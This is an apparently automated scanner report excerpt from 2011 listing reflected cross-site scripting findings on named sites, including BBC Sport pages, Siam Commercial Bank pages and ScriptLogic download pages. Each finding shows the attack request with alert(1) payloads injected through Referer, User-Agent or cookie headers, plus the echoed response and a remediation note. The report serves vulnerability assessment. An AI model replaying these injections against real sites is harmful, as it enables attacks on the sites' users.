The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 90e4d'-alert(1)-'2e1c856a6b0 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /go/rss/int/news/-/sport2/hi/formula_one/13267766.stm HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=90e4d'-alert(1)-'2e1c856a6b0

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Tue, 03 May 2011 13:25:23 GMT
Keep-Alive: timeout=10, max=793
Expires: Tue, 03 May 2011 13:25:23 GMT
Connection: close
Set-Cookie: BBC-UID=041d2c0060e2641338ef1a28d1fcee21bbd1d1b140a062e357dd0395366125160Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 02-May-12 13:25:23 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=041d2c0060e2641338ef1a28d1fcee21bbd1d1b140a062e357dd0395366125160Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 02-May-12 13:25:23 GMT; path=/; domain=bbc.co.uk;
Content-Length: 51778

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">



...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1304429123000,
       editionToServe: 'international',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=90e4d'-alert(1)-'2e1c856a6b0',
       section: 'formula-one',
       sectionPath: '/formula_one',
       siteName: 'BBC Sport',
       siteToServe: 'sport',
       siteVersion: 'wide',
       storyId: '13267766',
       assetType: 'story',
       uri: '/sport2/
...[SNIP]...

5.162. http://news.bbc.co.uk/sport2/hi/cricket/13264093.stm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /sport2/hi/cricket/13264093.stm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 26394'-alert(1)-'0dfcb3d66be was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sport2/hi/cricket/13264093.stm HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=26394'-alert(1)-'0dfcb3d66be

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Tue, 03 May 2011 13:25:16 GMT
Keep-Alive: timeout=10, max=759
Expires: Tue, 03 May 2011 13:25:16 GMT
Connection: close
Set-Cookie: BBC-UID=849dbce0e0f2d3bc0252da7ae12e91005ca16a7f70a072b3675dfa103563ea4e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 02-May-12 13:25:16 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=849dbce0e0f2d3bc0252da7ae12e91005ca16a7f70a072b3675dfa103563ea4e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 02-May-12 13:25:16 GMT; path=/; domain=bbc.co.uk;
Content-Length: 50178

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">



...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1304429116000,
       editionToServe: 'international',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=26394'-alert(1)-'0dfcb3d66be',
       section: 'sri-lanka',
       sectionPath: '/cricket',
       siteName: 'BBC Sport',
       siteToServe: 'sport',
       siteVersion: 'wide',
       storyId: '13264093',
       assetType: 'story',
       uri: '/sport2/hi/cri
...[SNIP]...

5.163. http://news.bbc.co.uk/sport2/hi/football/13265403.stm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /sport2/hi/football/13265403.stm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e5456'-alert(1)-'eedcba2fc56 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sport2/hi/football/13265403.stm HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=e5456'-alert(1)-'eedcba2fc56

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Tue, 03 May 2011 13:25:14 GMT
Keep-Alive: timeout=10, max=780
Expires: Tue, 03 May 2011 13:25:14 GMT
Connection: close
Set-Cookie: BBC-UID=247d3c00d052535acec842cef17c7c929806b9e1b0c0a1a91beb430f1bf4024e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 02-May-12 13:25:14 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=247d3c00d052535acec842cef17c7c929806b9e1b0c0a1a91beb430f1bf4024e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 02-May-12 13:25:14 GMT; path=/; domain=bbc.co.uk;
Content-Length: 57792

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">



...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1304429114000,
       editionToServe: 'international',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=e5456'-alert(1)-'eedcba2fc56',
       section: 'europe',
       sectionPath: '/football',
       siteName: 'BBC Sport',
       siteToServe: 'sport',
       siteVersion: 'wide',
       storyId: '13265403',
       assetType: 'story',
       uri: '/sport2/hi/footb
...[SNIP]...

5.164. http://news.bbc.co.uk/sport2/hi/formula_one/13267766.stm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /sport2/hi/formula_one/13267766.stm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ee9f2'-alert(1)-'dc9780a40d4 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sport2/hi/formula_one/13267766.stm HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=ee9f2'-alert(1)-'dc9780a40d4

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Tue, 03 May 2011 13:25:16 GMT
Keep-Alive: timeout=10, max=788
Expires: Tue, 03 May 2011 13:25:16 GMT
Connection: close
Set-Cookie: BBC-UID=f4ddbc80e002632ccc5b3c42f1a4726ddb223f88c000112af41b3a94f29c4b1a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 02-May-12 13:25:16 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=f4ddbc80e002632ccc5b3c42f1a4726ddb223f88c000112af41b3a94f29c4b1a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 02-May-12 13:25:16 GMT; path=/; domain=bbc.co.uk;
Content-Length: 51778

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">



...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1304429116000,
       editionToServe: 'international',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=ee9f2'-alert(1)-'dc9780a40d4',
       section: 'formula-one',
       sectionPath: '/formula_one',
       siteName: 'BBC Sport',
       siteToServe: 'sport',
       siteVersion: 'wide',
       storyId: '13267766',
       assetType: 'story',
       uri: '/sport2/
...[SNIP]...

5.165. http://scb.dev-orisma.com/en/friends-of-scb [User-Agent HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://scb.dev-orisma.com
Path:   /en/friends-of-scb

Issue detail

The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 97d99'-alert(1)-'f49a7c105ce was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /en/friends-of-scb HTTP/1.1
Host: scb.dev-orisma.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)97d99'-alert(1)-'f49a7c105ce
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:26:18 GMT
Server: Apache/2.2.8 (CentOS)
X-Powered-By: PHP/5.2.10
Set-Cookie: PHPSESSID=1b6r97hnbodh14c0t6q87djhv5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: public
Pragma: no-cache
Vary: Accept-Encoding
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 13488

<!doctype html>
<html lang="th" class="no-js">
<head>
<meta charset="UTF-8">
<title>Friends of SCB | The Siam Commercial Bank</title>

<link rel="shortcut icon" href="favicon.ico" type="image/x
...[SNIP]...
LangUrl(){
   return "http://scb.dev-orisma.com/en/";
}
window.onload = function(){
   var clientAgent = window.navigator.userAgent,
       serverAgent = 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)97d99'-alert(1)-'f49a7c105ce';
       
   if( clientAgent!=serverAgent ){
       var target = 'http://' + window.location.host + window.location.pathname;
       if(window.location.search.length>
...[SNIP]...

5.166. http://www.scb.co.th/en/home [User-Agent HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.scb.co.th
Path:   /en/home

Issue detail

The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f27bb'-alert(1)-'b41fbf69de4 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /en/home HTTP/1.1
Host: www.scb.co.th
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Siam+Commercial+Bank
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24f27bb'-alert(1)-'b41fbf69de4
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:31:03 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=fmrt1cm1i7mkusih2uucktqj25; path=/
Expires: Wed, 03 Nov 2010 12:31:03 GMT
Cache-Control: public
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 13989

<!doctype html>
<html lang="th" class="no-js">
<head>
<meta charset="UTF-8">
<title>The Siam Commercial Bank : To be the Bank of Choice for our Customers, Shareholders, Empolyee and Community</ti
...[SNIP]...
window.onload = function(){
   var clientAgent = window.navigator.userAgent,
       serverAgent = 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24f27bb'-alert(1)-'b41fbf69de4';
   var minLength = (Math.min(clientAgent.length,serverAgent.length) - 5);
   if( clientAgent.substring(0,minLength)!= serverAgent.substring(0,minLength) ){
       var target = 'http://' + window.location.
...[SNIP]...

5.167. http://www.scb.co.th/en/home/ [User-Agent HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.scb.co.th
Path:   /en/home/

Issue detail

The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b9870'-alert(1)-'0c5ea544d49 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /en/home/ HTTP/1.1
Host: www.scb.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0b9870'-alert(1)-'0c5ea544d49
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.scb.co.th/landing.html

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:33:52 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=qtib3o2ucdq667jengev8553o0; path=/
Expires: Wed, 03 Nov 2010 12:33:52 GMT
Cache-Control: public
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 13954

<!doctype html>
<html lang="th" class="no-js">
<head>
<meta charset="UTF-8">
<title>The Siam Commercial Bank : To be the Bank of Choice for our Customers, Shareholders, Empolyee and Community</ti
...[SNIP]...
turn "http://www.scb.co.th/en/";
}
window.onload = function(){
   var clientAgent = window.navigator.userAgent,
       serverAgent = 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0b9870'-alert(1)-'0c5ea544d49';
   var minLength = (Math.min(clientAgent.length,serverAgent.length) - 5);
   if( clientAgent.substring(0,minLength)!= serverAgent.substring(0,minLength) ){
       var target = 'http://' + window.location.
...[SNIP]...

5.168. http://dl.scriptlogic.com/download/default.aspx [EntryPoint cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dl.scriptlogic.com
Path:   /download/default.aspx

Issue detail

The value of the EntryPoint cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 26459"-alert(1)-"55bff08ad4a was submitted in the EntryPoint cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /download/default.aspx?pid=108&r=http%3a%2f%2fwww.sedoparking.com%2fsearch%2fregistrar.php%3fregistrar%3dsedonewreg%26domain%3dformlessnetworking.com HTTP/1.1
Host: dl.scriptlogic.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.scriptlogic.com/
Cookie: EntryPoint=/int/am/prodsel/05070926459"-alert(1)-"55bff08ad4a; __utma=197983533.2053962264.1304447516.1304447516.1304447516.1; __utmb=197983533.3.10.1304447516; __utmc=197983533; __utmz=197983533.1304447516.1.1.utmcsr=sedoparking.com|utmccn=(referral)|utmcmd=referral|utmcct=/search/registrar.php; _jsuid=2631301918575094172; s_cc=true; gpv_p11=Default; s_nr=1304447642079-New; s_vnum=1307039515685%26vn%3D1; s_invisit=true; s_sq=slcproduction%3D%2526pid%253DDefault%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.scriptlogic.com%25252F%252523%2526ot%253DA; EntryPointCheck=5/3/2011 9:32:06 AM

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:46:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=SX6uWSpAzAEkAAAAMzkxYjQ2NjAtMWZkNC00NDJlLThkZjMtOWM5YmVhNjNmZTgx8Z9iFLO-7KduZ4TQi2DGpW5uh041; expires=Tue, 12-Jul-2011 00:26:32 GMT; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=dxa2du45dlubrx3jq2dq3af5; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 21333


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   ScriptLogic &
...[SNIP]...
p%3fregistrar%3dsedonewreg%26domain%3dformlessnetworking.com"

s.channel = "login"
s.prop1 = "Combined"


s.pageType=""
/* Conversion Variables */
s.campaign="/int/am/prodsel/05070926459"-alert(1)-"55bff08ad4a"

s.state=""
s.zip=""
s.events=""
s.products=""
s.purchaseID=""
s.eVar1=""
s.eVar2=""
s.eVar3=""
s.eVar4=""
if (typeof slevent != 'undefined')
{
s.events = slevent;
}

if (typeof
...[SNIP]...

5.169. http://dl.scriptlogic.com/login/Combined.aspx [EntryPoint cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dl.scriptlogic.com
Path:   /login/Combined.aspx

Issue detail

The value of the EntryPoint cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 52fd2"-alert(1)-"05ab401b4d9 was submitted in the EntryPoint cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /login/Combined.aspx?pid=108&r=http%3a%2f%2fwww.sedoparking.com%2fsearch%2fregistrar.php%3fregistrar%3dsedonewreg%26domain%3dformlessnetworking.com HTTP/1.1
Host: dl.scriptlogic.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.scriptlogic.com/
Cookie: EntryPoint=/int/am/prodsel/05070952fd2"-alert(1)-"05ab401b4d9; __utma=197983533.2053962264.1304447516.1304447516.1304447516.1; __utmb=197983533.3.10.1304447516; __utmc=197983533; __utmz=197983533.1304447516.1.1.utmcsr=sedoparking.com|utmccn=(referral)|utmcmd=referral|utmcct=/search/registrar.php; _jsuid=2631301918575094172; s_cc=true; gpv_p11=Default; s_nr=1304447642079-New; s_vnum=1307039515685%26vn%3D1; s_invisit=true; s_sq=slcproduction%3D%2526pid%253DDefault%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.scriptlogic.com%25252F%252523%2526ot%253DA; EntryPointCheck=5/3/2011 9:32:06 AM; .ASPXANONYMOUS=cqPanChAzAEkAAAAMzRlNGY3MDktMmFiNC00YjcwLWI1ZTUtNzMxMzQ2ZDNhMThkvhu5LlNWIOX87OvHHDmbnJiqCYE1; ASP.NET_SessionId=g4zakovk25b4fty3jwvkx2mu

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:46:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 21333


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   ScriptLogic &
...[SNIP]...
p%3fregistrar%3dsedonewreg%26domain%3dformlessnetworking.com"

s.channel = "login"
s.prop1 = "Combined"


s.pageType=""
/* Conversion Variables */
s.campaign="/int/am/prodsel/05070952fd2"-alert(1)-"05ab401b4d9"

s.state=""
s.zip=""
s.events=""
s.products=""
s.purchaseID=""
s.eVar1=""
s.eVar2=""
s.eVar3=""
s.eVar4=""
if (typeof slevent != 'undefined')
{
s.events = slevent;
}

if (typeof
...[SNIP]...

5.170. http://dl.scriptlogic.com/login/CombinedRegister.aspx [EntryPoint cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dl.scriptlogic.com
Path:   /login/CombinedRegister.aspx

Issue detail

The value of the EntryPoint cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 43c81"-alert(1)-"efbc9f64bbc was submitted in the EntryPoint cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /login/CombinedRegister.aspx?pid=108&r=http%3a%2f%2fwww.sedoparking.com%2fsearch%2fregistrar.php%3fregistrar%3dsedonewreg%26domain%3dformlessnetworking.com HTTP/1.1
Host: dl.scriptlogic.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.scriptlogic.com/
Cookie: EntryPoint=/int/am/prodsel/05070943c81"-alert(1)-"efbc9f64bbc; __utma=197983533.2053962264.1304447516.1304447516.1304447516.1; __utmb=197983533.3.10.1304447516; __utmc=197983533; __utmz=197983533.1304447516.1.1.utmcsr=sedoparking.com|utmccn=(referral)|utmcmd=referral|utmcct=/search/registrar.php; _jsuid=2631301918575094172; s_cc=true; gpv_p11=Default; s_nr=1304447642079-New; s_vnum=1307039515685%26vn%3D1; s_invisit=true; s_sq=slcproduction%3D%2526pid%253DDefault%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.scriptlogic.com%25252F%252523%2526ot%253DA; EntryPointCheck=5/3/2011 9:32:06 AM; .ASPXANONYMOUS=cqPanChAzAEkAAAAMzRlNGY3MDktMmFiNC00YjcwLWI1ZTUtNzMxMzQ2ZDNhMThkvhu5LlNWIOX87OvHHDmbnJiqCYE1; ASP.NET_SessionId=g4zakovk25b4fty3jwvkx2mu

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:46:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 21333


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   ScriptLogic &
...[SNIP]...
p%3fregistrar%3dsedonewreg%26domain%3dformlessnetworking.com"

s.channel = "login"
s.prop1 = "Combined"


s.pageType=""
/* Conversion Variables */
s.campaign="/int/am/prodsel/05070943c81"-alert(1)-"efbc9f64bbc"

s.state=""
s.zip=""
s.events=""
s.products=""
s.purchaseID=""
s.eVar1=""
s.eVar2=""
s.eVar3=""
s.eVar4=""
if (typeof slevent != 'undefined')
{
s.events = slevent;
}

if (typeof
...[SNIP]...

5.171. http://seg.sharethis.com/getSegment.php [__stid cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://seg.sharethis.com
Path:   /getSegment.php

Issue detail

The value of the __stid cookie is copied into the HTML document as plain text between tags. The payload f30c9<script>alert(1)</script>174bae535a7 was submitted in the __stid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /getSegment.php?purl=http%3A%2F%2Fgroup.barclays.com%2FWhat-we-do%2FSponsorship%2FCommunity-sponsorship&jsref=http%3A%2F%2Fgroup.barclays.com%2FHome&rnd=1304436107086 HTTP/1.1
